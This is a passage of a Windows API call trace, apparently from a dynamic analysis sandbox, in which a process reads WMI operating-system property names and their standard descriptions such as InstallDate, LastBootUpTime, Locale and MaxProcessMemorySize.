	[0050.701] IWbemClassObject:Get (in: This=0x233e12d5150, wszName="Qualifiers", lFlags=0, pVal=0x350027edf0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027edf0*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0050.701] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c
	[0050.701] SysStringLen (param_1="FreeVirtualMemory") returned 0x11
	[0050.701] SysStringLen (param_1="CodeSet") returned 0x7
	[0050.701] SysStringLen (param_1="FreeVirtualMemory") returned 0x11
	[0050.701] SysStringLen (param_1="Description") returned 0xb
	[0050.701] SysStringLen (param_1="FreeVirtualMemory") returned 0x11
	[0050.701] SysStringLen (param_1="EncryptionLevel") returned 0xf
	[0050.701] SysStringLen (param_1="FreeVirtualMemory") returned 0x11
	[0050.701] SysStringLen (param_1="FreePhysicalMemory") returned 0x12
	[0050.701] SysStringLen (param_1="FreeVirtualMemory") returned 0x11
	[0050.701] SysStringLen (param_1="FreeSpaceInPagingFiles") returned 0x16
	[0050.701] SysStringLen (param_1="FreeSpaceInPagingFiles") returned 0x16
	[0050.701] SysStringLen (param_1="FreeVirtualMemory") returned 0x11
	[0050.702] IUnknown:Release (This=0x233e12d5150) returned 0x1
	[0050.702] SafeArrayGetElement (in: psa=0x233e128b6d0, rgIndices=0x350027f0b8, pv=0x350027f050 | out: pv=0x350027f050) returned 0x0
	[0050.702] IWbemClassObject:Get (in: This=0x233e12d56b0, wszName="Name", lFlags=0, pVal=0x350027f140*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x233e127f178, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027f140*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="InstallDate", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0050.702] IWbemClassObject:Get (in: This=0x233e12d56b0, wszName="Derivation", lFlags=0, pVal=0x350027f178*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x233e127f1c8, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027f178*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="InstallDate", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0050.702] GetCurrentThreadId () returned 0xdf0
	[0050.702] ??0CHString@@QEAA@XZ () returned 0x350027ef68
	[0050.702] IWbemClassObject:Get (in: This=0x233e12d56b0, wszName="Description", lFlags=0, pVal=0x350027ef78*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027ef78*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="The InstallDate property is datetime value indicating when the object was installed. A lack of a value does not indicate that the object is not installed.", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0050.702] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c
	[0050.703] lstrlenA (lpString="") returned 0
	[0050.703] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ff66e6bf38c, cbMultiByte=-1, lpWideCharStr=0x233e14fc0a0, cchWideChar=1 | out: lpWideCharStr="") returned 1
	[0050.703] SysStringLen (param_1="The InstallDate property is datetime value indicating when the object was installed. A lack of a value does not indicate that the object is not installed.") returned 0x9a
	[0050.703] SysStringLen (param_1="") returned 0x0
	[0050.703] GetCurrentThreadId () returned 0xdf0
	[0050.703] ??0CHString@@QEAA@XZ () returned 0x350027ed78
	[0050.703] IWbemClassObject:Get (in: This=0x233e12d56b0, wszName="Qualifiers", lFlags=0, pVal=0x350027edf0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027edf0*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0050.703] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c
	[0050.703] SysStringLen (param_1="InstallDate") returned 0xb
	[0050.703] SysStringLen (param_1="CodeSet") returned 0x7
	[0050.703] SysStringLen (param_1="InstallDate") returned 0xb
	[0050.703] SysStringLen (param_1="Description") returned 0xb
	[0050.703] SysStringLen (param_1="InstallDate") returned 0xb
	[0050.703] SysStringLen (param_1="EncryptionLevel") returned 0xf
	[0050.703] SysStringLen (param_1="InstallDate") returned 0xb
	[0050.703] SysStringLen (param_1="FreePhysicalMemory") returned 0x12
	[0050.703] SysStringLen (param_1="InstallDate") returned 0xb
	[0050.703] SysStringLen (param_1="FreeSpaceInPagingFiles") returned 0x16
	[0050.703] SysStringLen (param_1="InstallDate") returned 0xb
	[0050.703] SysStringLen (param_1="FreeVirtualMemory") returned 0x11
	[0050.703] SysStringLen (param_1="FreeVirtualMemory") returned 0x11
	[0050.703] SysStringLen (param_1="InstallDate") returned 0xb
	[0050.704] IUnknown:Release (This=0x233e12d56b0) returned 0x1
	[0050.704] SafeArrayGetElement (in: psa=0x233e128b6d0, rgIndices=0x350027f0b8, pv=0x350027f050 | out: pv=0x350027f050) returned 0x0
	[0050.704] IWbemClassObject:Get (in: This=0x233e12d5c10, wszName="Name", lFlags=0, pVal=0x350027f140*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x233e12ea958, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027f140*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="LastBootUpTime", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0050.704] IWbemClassObject:Get (in: This=0x233e12d5c10, wszName="Derivation", lFlags=0, pVal=0x350027f178*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x233e12ea628, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027f178*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="LastBootUpTime", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0050.704] GetCurrentThreadId () returned 0xdf0
	[0050.704] ??0CHString@@QEAA@XZ () returned 0x350027ef68
	[0050.704] IWbemClassObject:Get (in: This=0x233e12d5c10, wszName="Description", lFlags=0, pVal=0x350027ef78*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027ef78*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Time when the operating system was last booted", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0050.704] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c
	[0050.704] lstrlenA (lpString="") returned 0
	[0050.705] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ff66e6bf38c, cbMultiByte=-1, lpWideCharStr=0x233e14fc0b0, cchWideChar=1 | out: lpWideCharStr="") returned 1
	[0050.705] SysStringLen (param_1="Time when the operating system was last booted") returned 0x2e
	[0050.705] SysStringLen (param_1="") returned 0x0
	[0050.705] GetCurrentThreadId () returned 0xdf0
	[0050.705] ??0CHString@@QEAA@XZ () returned 0x350027ed78
	[0050.705] IWbemClassObject:Get (in: This=0x233e12d5c10, wszName="Qualifiers", lFlags=0, pVal=0x350027edf0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027edf0*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0050.705] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c
	[0050.705] SysStringLen (param_1="LastBootUpTime") returned 0xe
	[0050.705] SysStringLen (param_1="CodeSet") returned 0x7
	[0050.705] SysStringLen (param_1="LastBootUpTime") returned 0xe
	[0050.705] SysStringLen (param_1="Description") returned 0xb
	[0050.705] SysStringLen (param_1="LastBootUpTime") returned 0xe
	[0050.705] SysStringLen (param_1="EncryptionLevel") returned 0xf
	[0050.705] SysStringLen (param_1="LastBootUpTime") returned 0xe
	[0050.706] SysStringLen (param_1="FreePhysicalMemory") returned 0x12
	[0050.706] SysStringLen (param_1="LastBootUpTime") returned 0xe
	[0050.706] SysStringLen (param_1="FreeVirtualMemory") returned 0x11
	[0050.706] SysStringLen (param_1="LastBootUpTime") returned 0xe
	[0050.706] SysStringLen (param_1="InstallDate") returned 0xb
	[0050.706] SysStringLen (param_1="InstallDate") returned 0xb
	[0050.706] SysStringLen (param_1="LastBootUpTime") returned 0xe
	[0050.706] IUnknown:Release (This=0x233e12d5c10) returned 0x1
	[0050.706] SafeArrayGetElement (in: psa=0x233e128b6d0, rgIndices=0x350027f0b8, pv=0x350027f050 | out: pv=0x350027f050) returned 0x0
	[0050.706] IWbemClassObject:Get (in: This=0x233e12d5960, wszName="Name", lFlags=0, pVal=0x350027f140*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x233e127f1c8, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027f140*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="LocalDateTime", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0050.706] IWbemClassObject:Get (in: This=0x233e12d5960, wszName="Derivation", lFlags=0, pVal=0x350027f178*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x233e128b808, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027f178*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="LocalDateTime", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0050.706] GetCurrentThreadId () returned 0xdf0
	[0050.706] ??0CHString@@QEAA@XZ () returned 0x350027ef68
	[0050.706] IWbemClassObject:Get (in: This=0x233e12d5960, wszName="Description", lFlags=0, pVal=0x350027ef78*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027ef78*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Operating system's notion of the local date and time of day.", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0050.707] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c
	[0050.707] lstrlenA (lpString="") returned 0
	[0050.707] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ff66e6bf38c, cbMultiByte=-1, lpWideCharStr=0x233e14fc0c0, cchWideChar=1 | out: lpWideCharStr="") returned 1
	[0050.707] SysStringLen (param_1="Operating system's notion of the local date and time of day.") returned 0x3c
	[0050.707] SysStringLen (param_1="") returned 0x0
	[0050.707] GetCurrentThreadId () returned 0xdf0
	[0050.707] ??0CHString@@QEAA@XZ () returned 0x350027ed78
	[0050.707] IWbemClassObject:Get (in: This=0x233e12d5960, wszName="Qualifiers", lFlags=0, pVal=0x350027edf0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027edf0*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0050.707] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c
	[0050.708] SysStringLen (param_1="LocalDateTime") returned 0xd
	[0050.708] SysStringLen (param_1="CodeSet") returned 0x7
	[0050.708] SysStringLen (param_1="LocalDateTime") returned 0xd
	[0050.708] SysStringLen (param_1="Description") returned 0xb
	[0050.708] SysStringLen (param_1="LocalDateTime") returned 0xd
	[0050.708] SysStringLen (param_1="FreePhysicalMemory") returned 0x12
	[0050.708] SysStringLen (param_1="LocalDateTime") returned 0xd
	[0050.708] SysStringLen (param_1="FreeVirtualMemory") returned 0x11
	[0050.708] SysStringLen (param_1="LocalDateTime") returned 0xd
	[0050.708] SysStringLen (param_1="InstallDate") returned 0xb
	[0050.708] SysStringLen (param_1="LocalDateTime") returned 0xd
	[0050.708] SysStringLen (param_1="LastBootUpTime") returned 0xe
	[0050.708] SysStringLen (param_1="LastBootUpTime") returned 0xe
	[0050.708] SysStringLen (param_1="LocalDateTime") returned 0xd
	[0050.708] IUnknown:Release (This=0x233e12d5960) returned 0x1
	[0050.708] SafeArrayGetElement (in: psa=0x233e128b6d0, rgIndices=0x350027f0b8, pv=0x350027f050 | out: pv=0x350027f050) returned 0x0
	[0050.708] IWbemClassObject:Get (in: This=0x233e12d8af0, wszName="Name", lFlags=0, pVal=0x350027f140*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x233e128b808, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027f140*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Locale", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0050.708] IWbemClassObject:Get (in: This=0x233e12d8af0, wszName="Derivation", lFlags=0, pVal=0x350027f178*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x233e128bec8, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027f178*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Locale", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0050.708] GetCurrentThreadId () returned 0xdf0
	[0050.708] ??0CHString@@QEAA@XZ () returned 0x350027ef68
	[0050.709] IWbemClassObject:Get (in: This=0x233e12d8af0, wszName="Description", lFlags=0, pVal=0x350027ef78*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027ef78*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="The Locale property indicates the language identifier used by the operating system. A language identifier is a standard international numeric abbreviation for a country or region. Each language has a unique language identifier (LANGID), a 16-bit value that consists of a primary language identifier and a secondary language identifier.", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0050.709] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c
	[0050.709] lstrlenA (lpString="") returned 0
	[0050.709] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ff66e6bf38c, cbMultiByte=-1, lpWideCharStr=0x233e14fc1a0, cchWideChar=1 | out: lpWideCharStr="") returned 1
	[0050.709] SysStringLen (param_1="The Locale property indicates the language identifier used by the operating system. A language identifier is a standard international numeric abbreviation for a country or region. Each language has a unique language identifier (LANGID), a 16-bit value that consists of a primary language identifier and a secondary language identifier.") returned 0x14f
	[0050.709] SysStringLen (param_1="") returned 0x0
	[0050.709] GetCurrentThreadId () returned 0xdf0
	[0050.709] ??0CHString@@QEAA@XZ () returned 0x350027ed78
	[0050.709] IWbemClassObject:Get (in: This=0x233e12d8af0, wszName="Qualifiers", lFlags=0, pVal=0x350027edf0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027edf0*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0050.709] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c
	[0050.709] SysStringLen (param_1="Locale") returned 0x6
	[0050.709] SysStringLen (param_1="CodeSet") returned 0x7
	[0050.709] SysStringLen (param_1="Locale") returned 0x6
	[0050.709] SysStringLen (param_1="Description") returned 0xb
	[0050.710] SysStringLen (param_1="Locale") returned 0x6
	[0050.710] SysStringLen (param_1="FreePhysicalMemory") returned 0x12
	[0050.710] SysStringLen (param_1="Locale") returned 0x6
	[0050.710] SysStringLen (param_1="FreeVirtualMemory") returned 0x11
	[0050.710] SysStringLen (param_1="Locale") returned 0x6
	[0050.710] SysStringLen (param_1="LastBootUpTime") returned 0xe
	[0050.710] SysStringLen (param_1="Locale") returned 0x6
	[0050.710] SysStringLen (param_1="LocalDateTime") returned 0xd
	[0050.710] SysStringLen (param_1="LocalDateTime") returned 0xd
	[0050.710] SysStringLen (param_1="Locale") returned 0x6
	[0050.710] IUnknown:Release (This=0x233e12d8af0) returned 0x1
	[0050.710] SafeArrayGetElement (in: psa=0x233e128b6d0, rgIndices=0x350027f0b8, pv=0x350027f050 | out: pv=0x350027f050) returned 0x0
	[0050.710] IWbemClassObject:Get (in: This=0x233e12d8da0, wszName="Name", lFlags=0, pVal=0x350027f140*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x233e12ea988, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027f140*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Manufacturer", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0050.710] IWbemClassObject:Get (in: This=0x233e12d8da0, wszName="Derivation", lFlags=0, pVal=0x350027f178*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x233e12ea658, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027f178*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Manufacturer", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0050.710] ??0CHString@@QEAA@XZ () returned 0x350027ef68
	[0050.710] IWbemClassObject:Get (in: This=0x233e12d8da0, wszName="Description", lFlags=0, pVal=0x350027ef78*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027ef78*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="The Manufacturer property indicates the name of the operating system manufacturer.  For Win32 systems this value will be Microsoft Corporation.", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0050.711] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c
	[0050.711] lstrlenA (lpString="") returned 0
	[0050.711] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ff66e6bf38c, cbMultiByte=-1, lpWideCharStr=0x233e14fc1b0, cchWideChar=1 | out: lpWideCharStr="") returned 1
	[0050.711] SysStringLen (param_1="The Manufacturer property indicates the name of the operating system manufacturer.  For Win32 systems this value will be Microsoft Corporation.") returned 0x8f
	[0050.711] SysStringLen (param_1="") returned 0x0
	[0050.711] ??0CHString@@QEAA@XZ () returned 0x350027ed78
	[0050.711] IWbemClassObject:Get (in: This=0x233e12d8da0, wszName="Qualifiers", lFlags=0, pVal=0x350027edf0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027edf0*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0050.711] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c
	[0050.712] SysStringLen (param_1="Manufacturer") returned 0xc
	[0050.712] SysStringLen (param_1="Description") returned 0xb
	[0050.712] SysStringLen (param_1="Manufacturer") returned 0xc
	[0050.712] SysStringLen (param_1="FreePhysicalMemory") returned 0x12
	[0050.712] SysStringLen (param_1="Manufacturer") returned 0xc
	[0050.712] SysStringLen (param_1="FreeVirtualMemory") returned 0x11
	[0050.712] SysStringLen (param_1="Manufacturer") returned 0xc
	[0050.712] SysStringLen (param_1="LastBootUpTime") returned 0xe
	[0050.712] SysStringLen (param_1="Manufacturer") returned 0xc
	[0050.712] SysStringLen (param_1="LocalDateTime") returned 0xd
	[0050.712] SysStringLen (param_1="Manufacturer") returned 0xc
	[0050.712] SysStringLen (param_1="Locale") returned 0x6
	[0050.712] SysStringLen (param_1="Locale") returned 0x6
	[0050.712] SysStringLen (param_1="Manufacturer") returned 0xc
	[0050.712] IUnknown:Release (This=0x233e12d8da0) returned 0x1
	[0050.712] SafeArrayGetElement (in: psa=0x233e128b6d0, rgIndices=0x350027f0b8, pv=0x350027f050 | out: pv=0x350027f050) returned 0x0
	[0050.712] IWbemClassObject:Get (in: This=0x233e12d9860, wszName="Name", lFlags=0, pVal=0x350027f140*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x233e128bec8, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027f140*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="MaxNumberOfProcesses", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0050.712] IWbemClassObject:Get (in: This=0x233e12d9860, wszName="Derivation", lFlags=0, pVal=0x350027f178*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x233e128b848, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027f178*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="MaxNumberOfProcesses", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0050.713] ??0CHString@@QEAA@XZ () returned 0x350027ef68
	[0050.713] IWbemClassObject:Get (in: This=0x233e12d9860, wszName="Description", lFlags=0, pVal=0x350027ef78*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027ef78*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Maximum number of process contexts the operating system can support. If there is no fixed maximum, the value should be 0. On systems that have a fixed maximum, this object can help diagnose failures that occur when the maximum is reached. If unknown, enter -1.", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0050.713] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c
	[0050.713] lstrlenA (lpString="") returned 0
	[0050.713] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ff66e6bf38c, cbMultiByte=-1, lpWideCharStr=0x233e14fc0f0, cchWideChar=1 | out: lpWideCharStr="") returned 1
	[0050.713] SysStringLen (param_1="Maximum number of process contexts the operating system can support. If there is no fixed maximum, the value should be 0. On systems that have a fixed maximum, this object can help diagnose failures that occur when the maximum is reached. If unknown, enter -1.") returned 0x104
	[0050.713] SysStringLen (param_1="") returned 0x0
	[0050.713] ??0CHString@@QEAA@XZ () returned 0x350027ed78
	[0050.714] IWbemClassObject:Get (in: This=0x233e12d9860, wszName="Qualifiers", lFlags=0, pVal=0x350027edf0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027edf0*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0050.714] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c
	[0050.714] SysStringLen (param_1="MaxNumberOfProcesses") returned 0x14
	[0050.714] SysStringLen (param_1="Description") returned 0xb
	[0050.714] SysStringLen (param_1="MaxNumberOfProcesses") returned 0x14
	[0050.714] SysStringLen (param_1="FreePhysicalMemory") returned 0x12
	[0050.714] SysStringLen (param_1="MaxNumberOfProcesses") returned 0x14
	[0050.714] SysStringLen (param_1="FreeVirtualMemory") returned 0x11
	[0050.714] SysStringLen (param_1="MaxNumberOfProcesses") returned 0x14
	[0050.714] SysStringLen (param_1="LastBootUpTime") returned 0xe
	[0050.714] SysStringLen (param_1="MaxNumberOfProcesses") returned 0x14
	[0050.714] SysStringLen (param_1="Locale") returned 0x6
	[0050.714] SysStringLen (param_1="MaxNumberOfProcesses") returned 0x14
	[0050.714] SysStringLen (param_1="Manufacturer") returned 0xc
	[0050.714] SysStringLen (param_1="Manufacturer") returned 0xc
	[0050.714] SysStringLen (param_1="MaxNumberOfProcesses") returned 0x14
	[0050.714] IUnknown:Release (This=0x233e12d9860) returned 0x1
	[0050.714] SafeArrayGetElement (in: psa=0x233e128b6d0, rgIndices=0x350027f0b8, pv=0x350027f050 | out: pv=0x350027f050) returned 0x0
	[0050.715] IWbemClassObject:Get (in: This=0x233e12dade0, wszName="Name", lFlags=0, pVal=0x350027f140*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x233e1231d98, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027f140*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="MaxProcessMemorySize", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0050.715] IWbemClassObject:Get (in: This=0x233e12dade0, wszName="Derivation", lFlags=0, pVal=0x350027f178*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x233e12ebfe8, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027f178*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="MaxProcessMemorySize", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0050.715] ??0CHString@@QEAA@XZ () returned 0x350027ef68
	[0050.715] IWbemClassObject:Get (in: This=0x233e12dade0, wszName="Description", lFlags=0, pVal=0x350027ef78*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027ef78*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Maximum number of kilobytes of memory that can be allocated to a process. For operating systems with no virtual memory, this value is typically equal to the total amount of physical memory minus memory used by the BIOS and OS. For some operating systems, this value may be infinity - in which case, 0 should be entered. In other cases, this value could be a constant - for example, 2G or 4G.", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0050.715] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c
	[0050.715] lstrlenA (lpString="") returned 0
	[0050.715] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ff66e6bf38c, cbMultiByte=-1, lpWideCharStr=0x233e14fc240, cchWideChar=1 | out: lpWideCharStr="") returned 1
	[0050.715] SysStringLen (param_1="Maximum number of kilobytes of memory that can be allocated to a process. For operating systems with no virtual memory, this value is typically equal to the total amount of physical memory minus memory used by the BIOS and OS. For some operating systems, this value may be infinity - in which case, 0 should be entered. In other cases, this value could be a constant - for example, 2G or 4G.") returned 0x187
	[0050.715] SysStringLen (param_1="") returned 0x0
	[0050.716] ??0CHString@@QEAA@XZ () returned 0x350027ed78
	[0050.716] IWbemClassObject:Get (in: This=0x233e12dade0, wszName="Qualifiers", lFlags=0, pVal=0x350027edf0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027edf0*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0050.716] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c
	[0050.716] SysStringLen (param_1="MaxProcessMemorySize") returned 0x14
	[0050.716] SysStringLen (param_1="Description") returned 0xb
	[0050.716] SysStringLen (param_1="MaxProcessMemorySize") returned 0x14
	[0050.716] SysStringLen (param_1="FreePhysicalMemory") returned 0x12
	[0050.716] SysStringLen (param_1="MaxProcessMemorySize") returned 0x14
	[0050.716] SysStringLen (param_1="LastBootUpTime") returned 0xe
	[0050.716] SysStringLen (param_1="MaxProcessMemorySize") returned 0x14
	[0050.716] SysStringLen (param_1="Locale") returned 0x6
	[0050.716] SysStringLen (param_1="MaxProcessMemorySize") returned 0x14
	[0050.716] SysStringLen (param_1="Manufacturer") returned 0xc
	[0050.716] SysStringLen (param_1="MaxProcessMemorySize") returned 0x14
	[0050.716] SysStringLen (param_1="MaxNumberOfProcesses") returned 0x14
	[0050.716] SysStringLen (param_1="MaxNumberOfProcesses") returned 0x14
	[0050.716] SysStringLen (param_1="MaxProcessMemorySize") returned 0x14
	[0050.716] IUnknown:Release (This=0x233e12dade0) returned 0x1
	[0050.716] SafeArrayGetElement (in: psa=0x233e128b6d0, rgIndices=0x350027f0b8, pv=0x350027f050 | out: pv=0x350027f050) returned 0x0
	[0050.717] IWbemClassObject:Get (in: This=0x233e12db340, wszName="Name", lFlags=0, pVal=0x350027f140*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x233e12ebfe8, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027f140*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Name", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
